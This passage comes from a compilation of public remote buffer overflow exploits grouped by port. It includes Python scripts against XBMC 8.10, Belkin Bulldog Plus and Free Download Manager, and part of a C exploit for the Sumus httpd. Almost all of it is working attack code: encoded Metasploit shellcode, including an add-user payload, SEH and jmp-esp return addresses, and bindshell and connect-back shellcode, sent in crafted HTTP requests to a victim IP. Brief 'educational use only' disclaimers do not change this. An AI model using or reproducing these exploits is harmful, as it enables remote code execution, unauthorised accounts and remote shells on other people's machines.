"\x46\x46\x4b\x48\x43\x44\x42\x53\x4b\x38\x42\x34\x 4e\x30\x4b\x38"
"\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x 50\x45\x4a\x36"
"\x50\x58\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x 48\x4d\x48\x36"
"\x43\x35\x48\x36\x4a\x46\x43\x33\x44\x53\x4a\x46\x 47\x37\x43\x37"
"\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x 4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x35\x4f\x4f\x48\x4d\x4f\x55\x 49\x38\x45\x4e"
"\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x45\x 4c\x36\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x 4d\x4a\x47\x35"
"\x4f\x4f\x48\x4d\x43\x35\x43\x55\x43\x55\x43\x55\x 43\x55\x43\x34"
"\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x56\x 4a\x46\x41\x51"
"\x4e\x45\x48\x36\x43\x35\x49\x58\x41\x4e\x45\x59\x 4a\x46\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x 4c\x46\x42\x41"
"\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x 4d\x4a\x50\x52"
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x45\x 4f\x4f\x42\x4d"
"\x4a\x46\x45\x4e\x49\x44\x48\x58\x49\x44\x47\x55\x 4f\x4f\x48\x4d"
"\x42\x35\x46\x45\x46\x35\x45\x55\x4f\x4f\x42\x4d\x 43\x39\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x 48\x4d\x45\x45"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x56\x48\x56\x 4a\x36\x43\x46"
"\x4d\x56\x49\x48\x45\x4e\x4c\x46\x42\x35\x49\x35\x 49\x32\x4e\x4c"
"\x49\x48\x47\x4e\x4c\x56\x46\x54\x49\x48\x44\x4e\x 41\x53\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x 44\x34\x4e\x52"
"\x43\x59\x4d\x48\x4c\x47\x4a\x53\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x36"
"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x 46\x54\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x45\x41\x55\x41\x35\x 41\x45\x4c\x36"
"\x41\x30\x41\x55\x41\x35\x45\x45\x41\x35\x4f\x4f\x 42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x 48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x 47\x55\x4e\x4f"
"\x43\x48\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x 4f\x4f\x42\x4d"
"\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x35\x 4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a"
)
End_url ='.mp3)'
# create a socket object called 'c'
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to the socket
c.connect((host, port))
Request = (Start_url + Junk_buffer + Jump_esp + Shell_code + End_url)
# create a file-like object to read
fileobj = c.makefile('r', 0)
# Ask the server for the file
fileobj.write("GET /"+Request+" HTTP/1.1\n\n")
# [2009-04-01]
80 XBMC 8.10 GET Request Remote Buffer Overflow Exploit (SEH) (univ)
#!/usr/bin/env python
'''
Xbmc get request remote buffer overflow 8.10 *seh*(Universal address)!!
Tested:Win xp sp2 eng Win vista sp1
Vendor url:http://xbmc.org/
Release date:April the 4th 2009
versions affected: windows all versions.
I had tried awhile to get a nice pop ebx pop ret address and just
could not find a suitable one especially that was any good.and it
had to be shipped with the application and not have /safe seh.
To start with i looked at the zlib.dll to see of there were any
nice pop pop ret address i noticed there was one in particular that
stood out and decided to try it.
There is no need for me to release any more exploits for this application
as i have covered all the areas which i wanted to and want to
move on from this.
If your interested to see how this worked attach a debugger and add some
hit tracing :).It is possible to use this with all the buffer overflows
i released.
Credits to n00b for finding the buffer overflow and writing
exploit.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''
import sys, socket
import struct
port = 80
host = sys.argv[1]
#1635
Junk_buffer1 = 'A'*998
Pointer_To_Next_SEH = struct.pack('<L',0x909006eb)
###
###/SafeSEH Module Scanner, item 55
# SEH mode=/SafeSEH OFF
# Base=0x62e80000
# Limit=0x62e97000
# Module Name=C:\Program Files\XBMC\zlib1.dll
###
###This was found in the module zlib1 and is universal.
#62E83BAC 5B POP EBX
#62E83BAD 5D POP EBP
#62E83BAE ^E9 CDD9FFFF JMP zlib1.compressBound
SE_Handler = struct.pack('<L',0x62E83BAC)
Junk_buffer3 = 'D'*635
Shell_code=(#
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x 4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x 4a\x41\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x 46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x 46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x 44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x47\x 45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x58\x 4e\x50\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x38\x 4e\x41\x4b\x38"
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x 43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x48\x42\x44\x42\x43\x45\x38\x 42\x4c\x4a\x37"
"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x48\x42\x57\x 4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x 42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x43\x 4f\x55\x41\x43"
"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x 42\x4c\x4b\x57"
"\x42\x55\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x 4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x 43\x46\x41\x56"
"\x4e\x46\x43\x56\x50\x42\x45\x56\x4a\x37\x45\x36\x 42\x30\x5a"
)
# create a socket object called 'c'
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to the socket
c.connect((host, port))
Request = (Junk_buffer1 + Pointer_To_Next_SEH + SE_Handler + Shell_code + Junk_buffer3)
# create a file-like object to read
fileobj = c.makefile('r', 0)
# Ask the server for the file
fileobj.write("GET /"+Request+" HTTP/1.1\n\n")
# [2009-04-06]
80 XBMC 8.10 (HEAD) Remote Buffer Overflow Exploit (SEH)
#!/usr/bin/python
# Usage : exploit.py [victime_ip]
# Bug : XBMC 8.10 (HEAD Request) Remote Buffer Overflow Exploit (SEH)
# Refer : http://www.enigmagroup.org/exploits/8354
# Tested on : Xp sp2 (fr)
# Exploited by : His0k4
# Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
# Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
import struct
import sys, socket
host = sys.argv[1]
buff1 = 'A'*998
Pointer_To_Next_SEH = struct.pack('<L',0x909006eb)
###
###This was found in the module zlib1 and is universal.
#62E83BAC 5B POP EBX
#62E83BAD 5D POP EBP
#62E83BAE ^E9 CDD9FFFF JMP zlib1.compressBound
SE_Handler = struct.pack('<L',0x62E83BAC)
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shell_code=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x33\x 4b\x58\x4e\x37"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x 4a\x51\x4b\x48"
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x48\x 46\x33\x4b\x38"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x 46\x58\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x 44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x52\x46\x50\x45\x57\x 45\x4e\x4b\x38"
"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x 4e\x30\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x48\x 4e\x51\x4b\x38"
"\x41\x50\x4b\x4e\x49\x58\x4e\x45\x46\x32\x46\x50\x 43\x4c\x41\x33"
"\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x53\x45\x58\x 42\x4c\x4a\x57"
"\x4e\x30\x4b\x38\x42\x54\x4e\x30\x4b\x38\x42\x47\x 4e\x31\x4d\x4a"
"\x4b\x48\x4a\x56\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x 42\x38\x42\x4b"
"\x42\x50\x42\x30\x42\x30\x4b\x58\x4a\x56\x4e\x43\x 4f\x35\x41\x43"
"\x48\x4f\x42\x36\x48\x55\x49\x48\x4a\x4f\x43\x58\x 42\x4c\x4b\x57"
"\x42\x55\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x35\x 4a\x46\x4a\x39"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x 43\x46\x41\x46"
"\x4e\x36\x43\x36\x42\x30\x5a"
)
buff2 = 'B'*635
payload = buff1 + Pointer_To_Next_SEH + SE_Handler + shell_code + buff2
head = "HEAD /"+payload+" HTTP/1.1\r\n"
head += "Host: "+host+"\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,80))
s.send(head + "\r\n\r\n")
s.close()
# [2009-04-07 ]
80 Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit
#!/usr/bin/python
# _ _ _ __ _ _ _
#| || | (_) ___ / \ | |__ | | |
#| __ | | | (_-< | () | | / / |_ _|
#|_||_| |_| /__/ \__/ |_\_\ |_|
#
# Usage : belkin.py [victime_ip]
# Bug : Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit
# Credits go to : Elazar Broad
# Tested on : Xp sp3 (EN)(VB)
# Exploited by : His0k4
# Greetings : All friends & muslims HaCkErs (DZ),snakespc.com
# Chabiba wa sayd el ba7ri :D
import sys, socket
import base64
host = sys.argv[1]
port = 80
# win32_adduser - PASS=27 EXITFUNC=seh USER=DZ Size=477 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4a\x4e\x46\x54"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x 4b\x58\x4e\x37"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x 4a\x31\x4b\x58"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x48\x 46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x 46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x 44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x45\x46\x32\x46\x30\x45\x57\x 45\x4e\x4b\x48"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x 4e\x30\x4b\x34"
"\x4b\x58\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x 4e\x41\x4b\x38"
"\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x30\x 43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x53\x45\x48\x 42\x4c\x4a\x37"
"\x4e\x30\x4b\x58\x42\x34\x4e\x30\x4b\x48\x42\x57\x 4e\x41\x4d\x4a"
"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x 42\x58\x42\x4b"
"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x53\x 4f\x45\x41\x53"
"\x48\x4f\x42\x46\x48\x45\x49\x38\x4a\x4f\x43\x58\x 42\x4c\x4b\x37"
"\x42\x35\x4a\x36\x42\x4f\x4c\x38\x46\x50\x4f\x55\x 4a\x56\x4a\x39"
"\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x 43\x56\x4d\x56"
"\x46\x56\x50\x32\x45\x56\x4a\x57\x45\x36\x42\x32\x 4f\x52\x43\x56"
"\x42\x52\x50\x36\x45\x46\x46\x57\x42\x42\x45\x37\x 43\x47\x45\x46"
"\x44\x57\x42\x42\x46\x34\x4c\x55\x42\x42\x44\x43\x 47\x53\x42\x52"
"\x4f\x52\x41\x54\x46\x44\x46\x34\x42\x32\x48\x42\x 48\x42\x42\x52"
"\x50\x36\x45\x36\x46\x57\x42\x52\x4e\x36\x4f\x56\x 43\x56\x41\x46"
"\x4e\x56\x47\x36\x44\x57\x4f\x56\x45\x57\x42\x57\x 42\x32\x41\x54"
"\x46\x36\x4d\x36\x49\x46\x50\x46\x49\x46\x43\x57\x 46\x57\x44\x37"
"\x41\x46\x46\x37\x4f\x46\x44\x37\x43\x47\x42\x32\x 46\x54\x4c\x35"
"\x42\x52\x4f\x42\x41\x54\x46\x44\x46\x54\x42\x50\x 5a")
jump="\xFF\x54\x24\x58" #Jump to the GET request wich contains our shellcode.
ret="\xFF\x17\x49\x7E" #Friendly jmp esp "user32.dll".
junk = "\x41"*16
exploit1 = base64.encodestring(ret + jump + junk)
exploit2 = shellcode
head = 'GET '+exploit2+' HTTP/1.1\r\n'
head += 'Authorization: Basic '+exploit1+'\r\n\r\n'
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(head)
# [2009-04-27]
80 Free Download Manager 2.5/3.0 (Control Server) Remote BOF Exploit
#!/usr/bin/python
# Usage : fdm.py [victime_ip]
# Bug : Free Download Manager 2.5/3.0 (Control Server) Remote BOF Exploit
# Fix : update
# Founder : Praveen Darshanam
# Tested on : Xp sp3 (en)
# Exploited by : His0k4
# Greetings : All friends & muslims HaCkErs (DZ)
import sys, socket
import base64
from time import *
host = sys.argv[1]
port = 80
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4a\x4e\x46\x34"
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x 4b\x58\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x 4a\x31\x4b\x48"
"\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x38\x 46\x53\x4b\x38"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x 46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x 44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x 45\x4e\x4b\x38"
"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x38\x 4e\x50\x4b\x44"
"\x4b\x48\x4f\x35\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x 4e\x41\x4b\x48"
"\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x52\x46\x50\x 43\x4c\x41\x33"
"\x42\x4c\x46\x56\x4b\x48\x42\x44\x42\x43\x45\x58\x 42\x4c\x4a\x37"
"\x4e\x50\x4b\x38\x42\x44\x4e\x50\x4b\x38\x42\x37\x 4e\x31\x4d\x4a"
"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x 42\x38\x42\x4b"
"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x56\x4e\x43\x 4f\x45\x41\x43"
"\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\x4f\x43\x48\x 42\x4c\x4b\x37"
"\x42\x55\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x55\x 4a\x56\x4a\x49"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x 43\x56\x41\x56"
"\x4e\x46\x43\x46\x42\x50\x5a")
exploit = "3-1 "# a trick & a memory ;)
exploit += shellcode
exploit += "\x41"*(1003-len(shellcode))
exploit += "\xE8\x10\xFC\xFF\xFF"
exploit += "\x93\xB1\x40\x00" #jmp esp fdmwi
exploit += "\x90"*4
exploit += "\x73\xF1\x42\x42"
auth = base64.b64encode(exploit)
head = 'GET '+shellcode+' HTTP/1.1\r\n'
head += 'Host: '+sys.argv[1]+'\r\n'
head += 'Authorization: Basic '+auth+'\r\n\r\n'
i=0
#3a9liya MIAS xD
while i<=2:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(head)
i=i+1
# [2009-06-09]
إنتهينا من بورت 80
الان نبداء بـ بورت 81
81 Sumus 0.2.2 httpd Remote Buffer Overflow Exploit
/*[ sumus[v0.2.2]: (httpd) remote buffer overflow exploit. ]****
* *
* by: vade79/v9 [email protected] (fakehalo/realhalo) *
* *
* compile: *
* gcc xsumus.c -o xsumus *
* *
* syntax: *
* ./xsumus [-pscrln] -h host *
* *
* sumus homepage/url: *
* http://sumus.sourceforge.net *
* *
* Mus is a Spanish cards game played by 4 folks around a *
* table. SUMUS is a server for playing mus over Internet. The *
* project is just the server, but Java applet and Linux *
* console clients are provided. *
* *
* SUMUS contains a remotely exploitable buffer overflow in *
* the httpd portion of its server code, which runs *
* automatically upon starting the SUMUS server(usually port *
* 81). *
* *
* the overflow itself occurs on the stack, but it isn't quite *
* cut and dry as normal. this overflow occurs in a while() *
* byte-by-byte write loop, and the integers used in the loop *
* get overwritten before it makes it to the eip/return *
* address. this is best explained by viewing the code *
* itself: *
* *
* ----------------------------------------------------------- *
* char Buffer[65536] ; *
* ... *
* k = recv( SocketWebPendientes[ j ], Buffer, 20480, 0 ) ; *
* if( k > 0 ) *
* RespondeHTTPPendiente( j ) ; *
* ... *
* void RespondeHTTPPendiente( int Pos ) *
* { *
* int j ,kk ,faltan ; *
* char tmpCad[100], *p1, *p2 ; *
* FILE *f ; *
* *
* Buffer[400] = 0 ; *
* p1 = strstr( Buffer, "GET" ) ; *
* if( p1 == NULL ) p1 = strstr( Buffer, "Get" ) ; *
* if( p1 == NULL ) p1 = strstr( Buffer, "get" ) ; *
* if( p1 != NULL ) *
* { *
* j = 5 ; *
* kk = 0 ; *
* if( j < strlen(p1) ) *
* while ( p1[j] != ' ' && p1[j] ) *
* tmpCad[kk++] = p1[j++] ; *
* tmpCad[kk] = 0 ; *
* } *
* ... *
* ----------------------------------------------------------- *
* *
* as you can see this makes for a special situation. the *
* best method i came up with was to format the buffer like *
* so: *
* [400 bytes] | [20000 bytes] *
* [FILLER]["GET"][FILLER][new "kk"][ADDR] | [EGG/SHELLCODE] *
* *
* this way since the new "kk"/addr ends right the 400 *
* boundary point, only the overwritten "kk" integer needs to *
* be worried about(and not the "j" integer as well). *
* *
* i mainly made this because it was a moderatly different *
* exploit method than the norm. figured i'd see if it could *
* be done, and here we are. *
* *
* tested with default values(on static binary): *
* + gentoo-r5 : successful. *
* + mandrake9.1/default : successful. *
* + mandrake9.1/secure : failed. *
* + fedora core2 : successful. *
************************************************** *************/
#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <getopt.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFSIZE 399
#define EGGSIZE 20000
#define TIMEOUT 10
#define DFL_PORT 81
#define DFL_SPORT 7979
#define DFL_RETADDR 0x0805a001
#define DFL_LOCT_KK 105
#define DFL_JUMP_KK 10
/* globals. */
static char x86_bind[]= /* bindshell, from netric. */
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x 66"
"\xcd\x80\x31\xd2\x52\x66\x68\xff\xff\x43\x66\x53\x 89"
"\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x 89"
"\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x 52"
"\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x 80"
"\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x 68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\x cd"
"\x80";
static char x86_conn[]= /* connect-back, eSDee/netric. */
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x 51"
"\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\x c2"
"\x31\xc0\x31\xc9\x51\x51\x68\xff\xff\xff\xff\x66\x 68"
"\xff\xff\xb1\x02\x66\x51\x89\xe7\xb3\x10\x53\x57\x 52"
"\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1\x 74"
"\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\x d3"
"\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x 31"
"\xc0\xb0\x3f\x89\xd3\xb1\x02\xcd\x80\x31\xc0\x31\x d2"
"\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\x e3"
"\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x cd"
"\x80";
char *x86_ptr;
struct{
unsigned char new_kk;
signed short loct_kk;
unsigned int addr;
char *host;
unsigned short port;
unsigned short sport;
}tbl;
/* lonely extern. */
extern char *optarg;
/* functions. */
char *getbuf(unsigned int);
char *getegg(unsigned int);
unsigned short sumus_connect(char *,unsigned short);
void getshell(char *,unsigned short);
signed int getshell_bind_init(unsigned short);
signed int getshell_bind_accept(signed int);
signed int getshell_conn(char *,unsigned short);
void proc_shell(signed int);
void printe(char *,short);
void usage(char *);
void sig_alarm(){printe("alarm/timeout hit.",1);}
/* start. */
int main(int argc,char **argv){
unsigned char tmp_new=0;
signed int chr=0,rsock=0;
unsigned int bs=0;
struct hostent *t;
in_addr_t s=0;
printf(" sumus[v0.2.2]: (httpd) remote buffer overflow explo"
"it.\n by: vade79/v9 [email protected] (fakehalo/realhalo)\n\n");
tbl.port=DFL_PORT;
tbl.sport=DFL_SPORT;
tbl.addr=DFL_RETADDR;
tbl.loct_kk=DFL_LOCT_KK;
while((chr=getopt(argc,argv,"h:p:s:c:r:l:n:"))!=EOF){
switch(chr){
case 'h':
if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
printe("main(): allocating memory failed",1);
break;
case 'p':
tbl.port=atoi(optarg);
break;
case 's':
tbl.sport=atoi(optarg);
break;
case 'c':
if((s=inet_addr(optarg))){
if((t=gethostbyname(optarg)))
memcpy((char *)&s,(char *)t->h_addr,sizeof(s));
if(s==-1)s=0;
if(!s)printe("invalid host/ip. (-c option)",0);
}
break;
case 'r':
sscanf(optarg,"%x",&tbl.addr);
break;
case 'l':
tbl.loct_kk=atoi(optarg);
break;
case 'n':
tmp_new=atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if(!tbl.host)usage(argv[0]);
if(tbl.loct_kk<0||tbl.loct_kk>BUFSIZE)tbl.loct_kk=DFL_LOCT_KK;
/* set bind port for shellcode. */
if(!s){
bs=strlen(x86_bind);
x86_bind[20]=(tbl.sport&0xff00)>>8;
x86_bind[21]=(tbl.sport&0x00ff);
x86_ptr=x86_bind;
}
/* set connect-back ip/port for shellcode. */
else{
bs=strlen(x86_conn);
x86_conn[33]=(s&0x000000ff);
x86_conn[34]=(s&0x0000ff00)>>8;
x86_conn[35]=(s&0x00ff0000)>>16;
x86_conn[36]=(s&0xff000000)>>24;
x86_conn[39]=(tbl.sport&0xff00)>>8;
x86_conn[40]=(tbl.sport&0x00ff);
x86_ptr=x86_conn;
}
if(bs!=strlen(x86_ptr))
printe("ip(-c option) and/or port(-s option) appear to contain a "
"null-byte, try again.",1);
tbl.new_kk=(tbl.loct_kk+(tmp_new?tmp_new:DFL_JUMP_ KK));
if(!tbl.new_kk)
printe("ip(-l/-n option) made the overwritten \"kk\" integer a "
"null-byte.",1);
printf(" target\t\t\t: %s:%d\n",tbl.host,tbl.port);
printf(" shellcode type\t\t: %s(port=%d)\n",
(s?"connect-back":"bindshell"),tbl.sport);
printf(" return address($eip)\t: 0x%.8x\n",tbl.addr);
printf(" overwritten \"kk\" int value\t: "
"%u(0x%.2x)\n",tbl.new_kk,tbl.new_kk);
printf(" overflow size\t\t: %u(tot=%u) byte(s)\n",
tbl.loct_kk,BUFSIZE);
printf(" egg size\t\t\t: %u byte(s)\n\n",EGGSIZE);
if(s){
rsock=getshell_bind_init(tbl.sport);
sumus_connect(tbl.host,tbl.port);
rsock=getshell_bind_accept(rsock);
}
else{
sumus_connect(tbl.host,tbl.port);
rsock=getshell_conn(tbl.host,tbl.sport);
}
if(rsock>0)proc_shell(rsock);
exit(0);
}
char *getbuf(unsigned int addr){
char *buf;
if(!(buf=(char *)malloc(BUFSIZE+1)))
printe("getbuf(): allocating memory failed.",1);
/* 0x08 helps hide the appearance of a giant string, */
/* for the server side display. */
memset(buf,0x08,BUFSIZE);
memcpy(buf+(BUFSIZE-tbl.loct_kk-9),"GET",3);
/* this will overwrite the "kk" integer of the sumus server. */
buf[BUFSIZE-5]=tbl.new_kk;
/* the address/value used to write in the while() loop right */
/* after the "kk" integer has been overwritten/changed. */
*(long *)&buf[BUFSIZE-4]=addr;
buf[BUFSIZE]='\n';
return(buf);
}
char *getegg(unsigned int size){
char *buf;
if(!(buf=(char *)malloc(size+1)))
printe("getegg(): allocating memory failed",1);
memset(buf,0x90,(size-strlen(x86_ptr)));
memcpy(buf+(size-strlen(x86_ptr)),x86_ptr,
strlen(x86_ptr));
return(buf);
}
unsigned short sumus_connect(char *hostname,unsigned short port){
signed int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf(" attempting to connect: %s:%d.\n",hostname,port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve hostname.",1);
memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
